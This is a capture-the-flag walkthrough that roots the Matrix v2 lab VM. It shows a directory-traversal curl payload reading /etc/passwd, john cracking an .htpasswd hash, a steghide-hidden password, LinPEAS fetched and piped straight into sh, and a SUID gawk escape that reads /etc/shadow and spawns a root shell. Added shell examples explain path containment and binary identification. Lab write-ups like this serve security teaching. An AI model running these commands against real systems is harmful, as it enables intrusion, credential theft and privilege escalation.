https://www.vulnhub.com/entry/matrix-2,279/
Description: Matrix v2.0 is a medium level boot2root challenge. The OVA has been tested on both VMware and Virtual Box.
Difficulty: Intermediate
Flags: Your Goal is to get root and read /root/flag.txt
Networking:
- DHCP: Enabled
- IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate!
Run an nmap -A scan against all TCP ports:
└─$ nmap -A -p- 192.168.5.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-21 22:21 EDT
Nmap scan report for 192.168.5.106
Host is up (0.0030s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome in Matrix v2 Neo
1337/tcp open ssl/http nginx
|_http-title: 401 Authorization Required
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Welcome to Matrix 2
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
12320/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
12321/tcp open ssl/warehouse-sss?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
12322/tcp open ssl/http nginx
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Not valid before: 2018-12-07T14:14:44
|_Not valid after: 2028-12-07T14:14:44
| tls-nextprotoneg:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_file_view.php
|_http-title: Welcome in Matrix v2 Neo
Requesting https://192.168.5.106:12322/file_view.php (the path disallowed in robots.txt) returns a blank page. The page source contains:
<!-- Error file parameter missing..!!! -->
Capturing the request in Burp Suite shows the browser sends a GET; the script expects the file parameter in the body of a POST request.

*** I had trouble converting the GET to a POST request in Burp Suite; not sure why, but it wasn't changing to POST, so I had to use curl instead.
Use curl to send the POST request, passing a directory-traversal payload in the file parameter:
└─$ curl -X POST -k https://192.168.5.106:12322/file_view.php -d "file=../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
n30:x:1000:1000:Neo,,,:/home/n30:/bin/bash
testuser:x:1001:1001::/home/testuser:
* Note the two user accounts with home directories: testuser and n30.
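The note above picks out the accounts by eye. As an added example that is not part of the original write-up, here is a shell filter that lists the login-capable accounts from /etc/passwd output. It treats an empty shell field as /bin/sh (the login(1) default), which is why testuser, whose line ends without a shell, still gets a shell on ShellInABox. The passwd excerpt is constructed from the lines shown above plus two typical service accounts.

```sh
# Constructed /etc/passwd excerpt: the three lines recovered above plus two service accounts.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
n30:x:1000:1000:Neo,,,:/home/n30:/bin/bash
testuser:x:1001:1001::/home/testuser:'

# login_users: read passwd lines on stdin, print "user:uid:shell" for accounts that can log in.
# An empty 7th field means /bin/sh, so a filter that only greps for /bin/bash would miss testuser.
login_users() {
    awk -F: '{
        sh = ($7 == "") ? "/bin/sh" : $7
        if (sh !~ /(nologin|false|sync|halt|shutdown)$/) print $1 ":" $3 ":" sh
    }'
}

# demo_login_users: run the filter over the constructed excerpt.
demo_login_users() {
    printf '%s\n' "$SAMPLE_PASSWD" | login_users
}

demo_login_users
```

On the target the same filter is `awk -F: ...` over the /etc/passwd just retrieved, or over `getent passwd` once a shell is obtained.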
Log in to ShellInABox as testuser with the password testuser at https://192.168.5.106:12320/
Check the web root directories for interesting files:
└─$ ls -lah /usr/share/adminer/adminer/
total 28K
drwxr-xr-x 4 root root 4.0K Dec 14 2018 .
drwxr-xr-x 3 root root 4.0K Dec 8 2018 ..
drwxr-xr-x 2 root root 4.0K Dec 8 2018 css
-rw-r--r-- 1 root root 196 Dec 8 2018 file_view.php
-rw-r--r-- 1 root root 3.0K Dec 14 2018 index.php
drwxr-xr-x 2 root root 4.0K Dec 8 2018 js
-rw-r--r-- 1 root root 38 Dec 8 2018 robots.txt
└─$ ls -lah /var/www/
total 48K
drwxr-xr-x 4 root root 4.0K Dec 14 2018 .
drwxr-xr-x 12 root root 4.0K Dec 7 2018 ..
drwxr-xr-x 4 root root 4.0K Dec 14 2018 4cc3ss
-rw-r--r-- 1 root root 25K Dec 8 2018 h1dd3n.jpg
-rw-r--r-- 1 root root 3.6K Dec 14 2018 index.php
drwxr-xr-x 2 root root 4.0K Dec 8 2018 p4ss
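With the document root of the port 12322 site now known (/usr/share/adminer/adminer/, where file_view.php and robots.txt live), the traversal payload used earlier can be worked through. As an added example that is not part of the original write-up or of file_view.php itself, the following shell functions resolve a path lexically the way the kernel does on open(), which shows why ../../../../../etc/passwd lands on /etc/passwd from a directory four levels deep (surplus .. segments are absorbed at /), and implement the containment check the script evidently lacks. The web root value is taken from the listing above; the css/style.css name is assumed for illustration.

```sh
# resolve_path BASE REL: lexical resolution of BASE/REL. "." and empty segments are dropped,
# ".." pops one segment, and ".." at "/" is a no-op. No filesystem access, no symlink handling.
resolve_path() {
    out=""
    oldifs=$IFS
    IFS=/
    for seg in $1 $2; do
        case $seg in
            ''|.) ;;
            ..)   out=${out%/*} ;;
            *)    out="$out/$seg" ;;
        esac
    done
    IFS=$oldifs
    printf '%s\n' "${out:-/}"
}

# within_root BASE REL: succeed only when BASE/REL still resolves under BASE.
# This is the check file_view.php is missing. A production fix would also canonicalise
# symlinks (realpath) and prefer an allow-list of filenames over any path check.
within_root() {
    base=$(resolve_path "$1" "")
    target=$(resolve_path "$1" "$2")
    case $target in
        "$base"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

WEBROOT=/usr/share/adminer/adminer   # document root of the port 12322 site, from the listing above
resolve_path "$WEBROOT" '../../../../../etc/passwd'   # /etc/passwd: two surplus ".." absorbed at "/"
resolve_path "$WEBROOT" '../../etc/passwd'            # /usr/share/etc/passwd: too shallow to escape
within_root "$WEBROOT" 'css/style.css' && echo "css/style.css: inside the web root"
within_root "$WEBROOT" '../../../../../etc/passwd' || echo "traversal payload: rejected"
```

Because extra .. segments cost nothing, a payload with more ../ than the web root is deep is the safe choice when the depth is unknown, which is what the curl command above relied on.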
Obtain the Tr1n17y password hash from the .htpasswd file, which protects the basic-auth site on port 1337:
└─$ cat /var/www/p4ss/.htpasswd
Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
Crack the Tr1n17y hash with john (the line was saved to a file named htpasswd). The $apr1$ prefix is Apache's MD5-crypt variant, which john loads as md5crypt:
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin (Tr1n17y)
1g 0:00:00:01 DONE (2024-07-14 21:42) 0.7407g/s 14791p/s 14791c/s 14791C/s checkmate..jaleesa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
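Why the crack was so quick: $apr1$ is Apache's MD5-crypt, which john runs at roughly 15k candidates/s here on two threads, and admin is an early rockyou.txt candidate, so the password fell within a second. As an added example, not from the original write-up, the following shell snippet classifies each .htpasswd entry by its hash prefix and recomputes the apr1 hash with the openssl CLI to confirm a cracked password against the stored salt. The Tr1n17y line is the one recovered above; the alice and bob entries are constructed to show other formats and do not exist on the target.

```sh
# Constructed sample: the recovered Tr1n17y line plus two made-up entries (bcrypt and {SHA}).
SAMPLE_HTPASSWD='Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
alice:$2y$05$abcdefghijklmnopqrstuuJ1h4xZ/K1mGQnYkH7vE5I0zOa6Xk7O
bob:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g='

# htpasswd_type LINE: print "user:algorithm" for one .htpasswd line, judged by the hash prefix.
htpasswd_type() {
    user=${1%%:*}
    hash=${1#*:}
    case $hash in
        '$apr1$'*)                algo="apr1 (Apache MD5-crypt, fast to brute-force)" ;;
        '$2y$'*|'$2a$'*|'$2b$'*)  algo="bcrypt (slow, preferred)" ;;
        '{SHA}'*)                 algo="unsalted SHA-1" ;;
        *)                        algo="crypt(3) or unknown" ;;
    esac
    printf '%s:%s\n' "$user" "$algo"
}

# apr1_check PASSWORD LINE: recompute the apr1 hash with the salt from LINE (field 3 of the
# "$apr1$salt$digest" string) and compare; exit 0 when PASSWORD reproduces the stored hash.
apr1_check() {
    stored=${2#*:}
    salt=$(printf '%s' "$stored" | cut -d'$' -f3)
    calc=$(openssl passwd -apr1 -salt "$salt" "$1")
    [ "$calc" = "$stored" ]
}

printf '%s\n' "$SAMPLE_HTPASSWD" | while IFS= read -r line; do htpasswd_type "$line"; done
if command -v openssl >/dev/null 2>&1; then
    apr1_check admin 'Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0' && echo "Tr1n17y:admin verified"
fi
```

The verification step is the same thing john does, one candidate at a time; it is useful when a cracked credential is to be reused against another service and a typo in the hash file would otherwise go unnoticed.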
Navigate to https://192.168.5.106:1337/ and authenticate with the cracked credentials Tr1n17y:admin. The page shows the string n30 in bright red, which suggests it might be a password.

Download the hidden JPEG seen in the /var/www listing above: https://192.168.5.106:1337/h1dd3n.jpg
Install steghide on Kali and run it against the JPEG, using n30 as the passphrase:
└─$ sudo apt install steghide
└─$ steghide extract -sf h1dd3n.jpg
Enter passphrase: n30
wrote extracted data to "n30.txt".
└─$ cat n30.txt
P4$$w0rd
Log in to ShellInABox as n30 with the password P4$$w0rd at https://192.168.5.106:12320/
Run LinPEAS:
$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Of note in the LinPEAS output: an unrecognised SUID binary, /usr/bin/morpheus, owned by root and executable only by root and members of group n30:
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
You own the SUID file: /tmp/bash
-rwsr-xr-x 1 root root 11K Jan 22 2017 /usr/lib/authbind/helper
-rwsr-xr-x 1 root root 431K Aug 21 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 59K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 40K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-r-sr-x--- 1 root n30 647K Dec 8 2018 /usr/bin/morpheus (Unknown SUID binary!)
/usr/bin/morpheus is the gawk binary under another name; running it with no arguments prints gawk's usage text:
n30@Matrix_2 ~$ /usr/bin/morpheus
Usage: morpheus [POSIX or GNU style options] -f progfile [--] file ...
Usage: morpheus [POSIX or GNU style options] [--] 'program' file ...
POSIX options: GNU long options: (standard)
...
To report bugs, see node `Bugs' in `gawk.info', which is
section `Reporting Problems and Bugs' in the printed version.
gawk is a pattern scanning and processing language.
By default it reads standard input and writes standard output.
Examples:
gawk '{ sum += $1 }; END { print sum }' file
gawk -F: '{ print $1 }' /etc/passwd
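LinPEAS marks morpheus as unknown and the write-up identifies it by executing it, which is not always wise with an unfamiliar setuid program. As an added example that is not part of the original write-up, here are shell functions that list setuid files under a directory (the check LinPEAS performs) and identify a renamed binary by hashing it against the files in candidate directories, so that a stock gawk installed as morpheus is recognised without being run. The fixture (a fake gawk copied to bin/morpheus with the setuid bit) is constructed so the example runs offline; on the target the candidate directories would be /usr/bin and /bin.

```sh
# find_suid DIR: regular files under DIR with the setuid bit (what LinPEAS' SUID check does), sorted.
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# identify_by_hash FILE DIR...: print the first file in the DIRs whose SHA-256 equals FILE's.
# A stock binary installed under another name is caught without executing it.
identify_by_hash() {
    target=$1; shift
    want=$(sha256sum "$target" | cut -d' ' -f1)
    for dir in "$@"; do
        for cand in "$dir"/*; do
            [ -f "$cand" ] || continue
            [ "$cand" -ef "$target" ] && continue   # same inode: skip the file itself
            got=$(sha256sum "$cand" | cut -d' ' -f1)
            if [ "$got" = "$want" ]; then
                printf '%s\n' "$cand"
                return 0
            fi
        done
    done
    return 1
}

# make_fixture: constructed stand-in for the target, a fake "gawk" copied to bin/morpheus
# with the setuid bit set; prints the temporary directory it created.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/real" "$d/bin"
    printf '#!/bin/sh\necho "fake gawk"\n' > "$d/real/gawk"
    printf '#!/bin/sh\necho "unrelated"\n' > "$d/real/other"
    chmod 755 "$d/real/gawk" "$d/real/other"
    cp "$d/real/gawk" "$d/bin/morpheus"
    chmod 4755 "$d/bin/morpheus"
    printf '%s\n' "$d"
}

fx=$(make_fixture)
find_suid "$fx"                                  # .../bin/morpheus
identify_by_hash "$fx/bin/morpheus" "$fx/real"   # .../real/gawk
rm -rf "$fx"

# On the real host: find_suid / ; identify_by_hash /usr/bin/morpheus /usr/bin /bin ;
# and dpkg -S /usr/bin/morpheus, which reports no owning package for a hand-placed file.
```

When no hash matches (a patched or custom binary), `strings` output and the usage banner, as seen above, are the next step; the hash check simply avoids executing the file first.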
Use the gawk SUID file-read vector from GTFOBins (https://gtfobins.github.io/gtfobins/gawk/) to read /etc/shadow; the empty pattern '//' matches every line, so gawk prints the whole file with root's effective uid:
n30@Matrix_2 ~$ LFILE=/etc/shadow
n30@Matrix_2 ~$ /usr/bin/morpheus '//' "$LFILE"
root:$6$d6i7/gdA$w/VkPrhMPBcRgaelZs0gwuugQ0M6MLxj8qSPjCv6zzdHIJwPmA1NKBn8LBHdRiGIjz3HyCFdVmD.nq0yJZvh90:17878:0:99999:7:::
...
I tried to crack this password hash with rockyou.txt but had no success.
Use the gawk SUID shell vector from GTFOBins (https://gtfobins.github.io/gtfobins/gawk/) to spawn a shell. Note in the id output that euid is 0 while uid stays 1000: /bin/sh on the target keeps the setuid effective uid, whereas bash would drop it unless started with -p, so on a system where /bin/sh is bash the call would need to be system("/bin/bash -p"):
n30@Matrix_2 ~$ /usr/bin/morpheus 'BEGIN {system("/bin/sh")}'
# id
uid=1000(n30) gid=1000(n30) euid=0(root) groups=1000(n30)
Cat the flag in /root:
# cat /root/flag.txt
╦ ╦┌─┐┬ ┬┬─┐┌─┐ ┌─┐┌─┐┌─┐┌┬┐┌─┐┬─┐ ┌┬┐┬ ┬┌─┐┌┐┌ ┌┬┐┬ ┬┬┌─┐
╚╦╝│ ││ │├┬┘├┤ ├┤ ├─┤└─┐ │ ├┤ ├┬┘ │ ├─┤├─┤│││ │ ├─┤│└─┐
╩ └─┘└─┘┴└─└─┘ └ ┴ ┴└─┘ ┴ └─┘┴└─ ┴ ┴ ┴┴ ┴┘└┘ ┴ ┴ ┴┴└─┘o
╔╦╗┌─┐┌┐┌┌┬┐ ┌┬┐┬ ┬┬┌┐┌┬┌─ ┬ ┬┌─┐┬ ┬ ┌─┐┬─┐┌─┐
║║│ ││││ │ │ ├─┤││││├┴┐ └┬┘│ ││ │ ├─┤├┬┘├┤
═╩╝└─┘┘└┘ ┴ ┴ ┴ ┴┴┘└┘┴ ┴ ┴ └─┘└─┘ ┴ ┴┴└─└─┘┘
┬┌─┌┐┌┌─┐┬ ┬ ┬ ┬┌─┐┬ ┬ ┌─┐┬─┐┌─┐
├┴┐││││ ││││ └┬┘│ ││ │ ├─┤├┬┘├┤
┴ ┴┘└┘└─┘└┴┘ ┴ └─┘└─┘ ┴ ┴┴└─└─┘o
╔╦╗┌─┐┬─┐┌─┐┬ ┬┌─┐┬ ┬┌─┐
───║║║│ │├┬┘├─┘├─┤├┤ │ │└─┐
╩ ╩└─┘┴└─┴ ┴ ┴└─┘└─┘└─┘
╔═╗╦╔═╔═╗
╠═╣╠╩╗╠═╣
╩ ╩╩ ╩╩ ╩
┬ ┬┌┐┌┬┌─┌┐┌┌─┐┬ ┬┌┐┌┌┬┐┌─┐┬ ┬┬┌─┐┌─┐
│ ││││├┴┐││││ │││││││ ││├┤ └┐┌┘││ ├┤ 64
└─┘┘└┘┴ ┴┘└┘└─┘└┴┘┘└┘─┴┘└─┘ └┘ ┴└─┘└─┘